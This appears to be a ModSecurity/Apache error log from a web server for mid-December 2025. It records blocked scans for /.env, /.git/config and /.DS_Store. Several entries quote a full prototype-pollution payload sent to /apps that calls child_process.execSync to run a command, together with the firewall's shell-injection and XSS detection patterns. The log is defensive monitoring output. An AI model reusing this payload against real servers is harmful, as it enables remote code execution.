[Tue Dec 16 06:05:03.441030 2025] [:error] [pid 769365] [client 128.199.182.55:50452] [client 128.199.182.55] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUDof76pu6t2QFY7wBUNYAAAAAI"]
[Tue Dec 16 06:05:05.509676 2025] [:error] [pid 769706] [client 128.199.182.55:50460] [client 128.199.182.55] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUDogT0mEQXjYhIVaHH4ugAAAAo"]
[Tue Dec 16 06:05:05.509911 2025] [:error] [pid 769706] [client 128.199.182.55:50460] [client 128.199.182.55] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUDogT0mEQXjYhIVaHH4ugAAAAo"]
[Tue Dec 16 06:05:05.510082 2025] [:error] [pid 769706] [client 128.199.182.55:50460] [client 128.199.182.55] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUDogT0mEQXjYhIVaHH4ugAAAAo"]
[Tue Dec 16 15:57:17.729961 2025] [:error] [pid 772735] [client 3.110.104.99:50738] [client 3.110.104.99] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUFzTeFX8wuWa87yIpfnAAAAAAM"]
[Tue Dec 16 15:57:17.730567 2025] [:error] [pid 772735] [client 3.110.104.99:50738] [client 3.110.104.99] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUFzTeFX8wuWa87yIpfnAAAAAAM"]
[Tue Dec 16 15:57:17.731535 2025] [:error] [pid 772735] [client 3.110.104.99:50738] [client 3.110.104.99] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUFzTeFX8wuWa87yIpfnAAAAAAM"]
[Tue Dec 16 15:57:17.731715 2025] [:error] [pid 772735] [client 3.110.104.99:50738] [client 3.110.104.99] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUFzTeFX8wuWa87yIpfnAAAAAAM"]
[Tue Dec 16 15:57:18.023540 2025] [:error] [pid 772734] [client 3.110.104.99:50742] [client 3.110.104.99] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUFzTjN7bCTU4pmWUN9EZwAAAAI"]
[Tue Dec 16 15:57:18.023975 2025] [:error] [pid 772734] [client 3.110.104.99:50742] [client 3.110.104.99] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUFzTjN7bCTU4pmWUN9EZwAAAAI"]
[Tue Dec 16 15:57:18.024907 2025] [:error] [pid 772734] [client 3.110.104.99:50742] [client 3.110.104.99] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUFzTjN7bCTU4pmWUN9EZwAAAAI"]
[Tue Dec 16 15:57:18.025080 2025] [:error] [pid 772734] [client 3.110.104.99:50742] [client 3.110.104.99] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUFzTjN7bCTU4pmWUN9EZwAAAAI"]
[Thu Dec 18 05:21:45.654128 2025] [authz_core:error] [pid 813020] [client 159.223.132.86:48568] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Dec 18 05:21:48.666042 2025] [:error] [pid 813019] [client 159.223.132.86:48592] [client 159.223.132.86] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUOBXDZTDxRxH4PwP3ShCgAAAAM"]
[Thu Dec 18 05:21:48.666270 2025] [:error] [pid 813019] [client 159.223.132.86:48592] [client 159.223.132.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUOBXDZTDxRxH4PwP3ShCgAAAAM"]
[Thu Dec 18 05:21:48.666455 2025] [:error] [pid 813019] [client 159.223.132.86:48592] [client 159.223.132.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUOBXDZTDxRxH4PwP3ShCgAAAAM"]
[Thu Dec 18 05:21:49.664133 2025] [:error] [pid 813359] [client 159.223.132.86:32960] [client 159.223.132.86] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUOBXbjsQ2OAT5oMPR4uIgAAAAc"]
[Thu Dec 18 05:21:49.664385 2025] [:error] [pid 813359] [client 159.223.132.86:32960] [client 159.223.132.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUOBXbjsQ2OAT5oMPR4uIgAAAAc"]
[Thu Dec 18 05:21:49.664578 2025] [:error] [pid 813359] [client 159.223.132.86:32960] [client 159.223.132.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUOBXbjsQ2OAT5oMPR4uIgAAAAc"]
[Thu Dec 18 05:21:51.718056 2025] [:error] [pid 813017] [client 159.223.132.86:32976] [client 159.223.132.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUOBX2EDlGizgYLL-JCLsgAAAAE"]
[Thu Dec 18 05:21:51.718279 2025] [:error] [pid 813017] [client 159.223.132.86:32976] [client 159.223.132.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUOBX2EDlGizgYLL-JCLsgAAAAE"]
[Thu Dec 18 05:21:51.718454 2025] [:error] [pid 813017] [client 159.223.132.86:32976] [client 159.223.132.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUOBX2EDlGizgYLL-JCLsgAAAAE"]
[Thu Dec 18 06:21:31.471868 2025] [authz_core:error] [pid 813020] [client 165.22.235.3:53824] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Dec 18 06:21:34.473505 2025] [:error] [pid 813018] [client 165.22.235.3:53846] [client 165.22.235.3] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUOPXkBkfFvq8O6HEbsoPAAAAAI"]
[Thu Dec 18 06:21:34.473738 2025] [:error] [pid 813018] [client 165.22.235.3:53846] [client 165.22.235.3] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUOPXkBkfFvq8O6HEbsoPAAAAAI"]
[Thu Dec 18 06:21:34.473884 2025] [:error] [pid 813018] [client 165.22.235.3:53846] [client 165.22.235.3] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUOPXkBkfFvq8O6HEbsoPAAAAAI"]
[Thu Dec 18 06:21:35.509240 2025] [:error] [pid 813359] [client 165.22.235.3:53858] [client 165.22.235.3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUOPX7jsQ2OAT5oMPR4uOAAAAAc"]
[Thu Dec 18 06:21:35.509468 2025] [:error] [pid 813359] [client 165.22.235.3:53858] [client 165.22.235.3] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUOPX7jsQ2OAT5oMPR4uOAAAAAc"]
[Thu Dec 18 06:21:35.509615 2025] [:error] [pid 813359] [client 165.22.235.3:53858] [client 165.22.235.3] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUOPX7jsQ2OAT5oMPR4uOAAAAAc"]
[Thu Dec 18 06:21:37.621241 2025] [:error] [pid 813016] [client 165.22.235.3:55734] [client 165.22.235.3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUOPYdoXgPZsLH_wMFNydAAAAAA"]
[Thu Dec 18 06:21:37.621475 2025] [:error] [pid 813016] [client 165.22.235.3:55734] [client 165.22.235.3] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUOPYdoXgPZsLH_wMFNydAAAAAA"]
[Thu Dec 18 06:21:37.621622 2025] [:error] [pid 813016] [client 165.22.235.3:55734] [client 165.22.235.3] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUOPYdoXgPZsLH_wMFNydAAAAAA"]
[Thu Dec 18 06:21:44.739210 2025] [authz_core:error] [pid 813017] [client 157.230.19.140:47574] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Dec 18 06:21:47.720563 2025] [:error] [pid 813019] [client 157.230.19.140:47600] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUOPazZTDxRxH4PwP3ShIAAAAAM"]
[Thu Dec 18 06:21:47.720800 2025] [:error] [pid 813019] [client 157.230.19.140:47600] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUOPazZTDxRxH4PwP3ShIAAAAAM"]
[Thu Dec 18 06:21:47.720963 2025] [:error] [pid 813019] [client 157.230.19.140:47600] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUOPazZTDxRxH4PwP3ShIAAAAAM"]
[Thu Dec 18 06:21:48.737170 2025] [:error] [pid 813218] [client 157.230.19.140:47606] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUOPbJ5vyU4YKdXrlw0wDgAAAAY"]
[Thu Dec 18 06:21:48.737412 2025] [:error] [pid 813218] [client 157.230.19.140:47606] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUOPbJ5vyU4YKdXrlw0wDgAAAAY"]
[Thu Dec 18 06:21:48.737560 2025] [:error] [pid 813218] [client 157.230.19.140:47606] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUOPbJ5vyU4YKdXrlw0wDgAAAAY"]
